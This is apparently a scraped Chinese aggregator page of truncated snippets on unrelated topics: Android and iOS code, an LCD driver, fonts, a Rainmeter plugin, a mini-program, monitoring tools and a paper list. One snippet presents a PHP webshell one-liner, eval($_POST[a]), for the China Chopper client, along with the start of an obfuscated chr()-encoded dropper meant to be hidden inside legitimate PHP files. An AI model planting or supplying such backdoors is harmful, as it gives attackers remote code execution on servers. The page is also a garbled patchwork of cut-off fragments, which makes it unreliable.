longquan】的更多相关文章

/** * 登录后将数据填写到主数据 */ public void login(String login_nr) { //File f = new File(android.os.Environment.getExternalStorageDirectory()+"/info.txt"); //后面是跟你在sd卡上存放的xml路径 String path = this.ReadFilePatch("/info.txt"); File myfile=new File(…
原文出处:http://my.oschina.net/longquan/blog/155905 首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).ch…
从一个Controller跳转到另一个Controller时,一般有以下2种: 1.利用UINavigationController,调用pushViewController,进行跳转:这种采用压栈和出栈的方式,进行Controller的管理.调用popViewControllerAnimated方法可以返回. PickImageViewController *ickImageViewController = [[PickImageViewController alloc] init];    …
转载自:http://longquan.iteye.com/blog/1669990 存: //此处首先指定了图片存取路径(默认写到应用程序沙盒 中) NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory,NSUserDomainMask, YES); //并给文件起个文件名 NSString *uniquePath=[[paths objectAtIndex:0] stringByAppendingPa…
http://www.amobbs.com/thread-4301955-1-1.html *此处只摘录部分内容,详细内容请关注原贴. 这就是电路,细心的朋友会发现实物图中有几个贴片的阻容件,秘密就在这里,利用电容的记忆效应,把并行的数据转为串行.(原文件名:2wire_1602.PNG) 示范程序很简单,不用多注释应该都能看懂.作为演示用途,其中有些长时间延时没有没有使用定时器,在多任务系统中当然要用定时中断来代替了. //         Drive a LCD1602 with 2 wir…
字王大藏经体v0.1概念版 zw-dzj 字王大藏经体v0.1概念版,是字王<中华大字库>2018版升级过程当中,在Github搜索资源时的意外惊喜. 大藏经为佛教经典的总集,简称为藏经.(细节请大家自己百度) Github网站的大藏经开源项目,是北京市龙泉寺藏经办公室发布的 项目网址,https://github.com/CoinLQ?page=2,大藏经 · GitHub 机构网址:http://112.74.23.141/V3/about.html?lang=zhs 没想到,古老的寺庙,…
rainmeter天气插件的原理是用爬虫抓取一个天气网页然后用自带的那一套正则表达式匹配出天气信息 在国外官网社区下载的插件的天气信息城市都会出现问题(因为插件作者又不知道你在哪),解决方法是在原基础上纠正城市代码或者换一个url和正则表达式 我选择的前者 但我并不知道是哪个天气网站的api,于是我就根据url的规律爬了将近10000个应该是中国城市的代码,如下 纠正方法 打开rainmeter找到你要修正的插件右键选择编辑皮肤 然后就会看到这样的url(网址) 正确的url格式为 http:/…
[{ "label": "北京Beijing010", "name": "北京", "pinyin": "Beijing", "zip": "010" }, { "label": "重庆Chongqing023", "name": "重庆", "pinyin&…
ylbtech-小程序-demo:天气预报 1.返回顶部 1.app.js //app.js App({ //系统事件 onLaunch: function () {//小程序初始化事件 var that=this; //调用API从本地缓存中获取数据 that.curid = wx.getStorageSync('curid') || that.curid;//API:获取本地缓存,若不存在设置为全局属性 that.setlocal('curid', that.curid);//调用全局方法…
转自:https://www.percona.com/doc/percona-monitoring-and-management/architecture.html 报警机制https://www.percona.com/blog/2017/02/02/pmm-alerting-with-grafana-working-with-templated-dashboards/https://blog.csdn.net/ashic/article/details/78830443 https://my…
CVPR2017 paper list Machine Learning 1 Spotlight 1-1A Exclusivity-Consistency Regularized Multi-View Subspace Clustering Xiaojie Guo, Xiaobo Wang, Zhen Lei, Changqing Zhang, Stan Z. Li Borrowing Treasures From the Wealthy: Deep Transfer Learning Thro…
接下来我们进行的就是城市列表页面数据额动态渲染. 也是在mock数据,进行动态渲染 //city.json { "ret": true, "data":{ "hotCities": [{ "id": 1, "spell": "beijing", "name": "北京" }, { "id": 3, "spell&quo…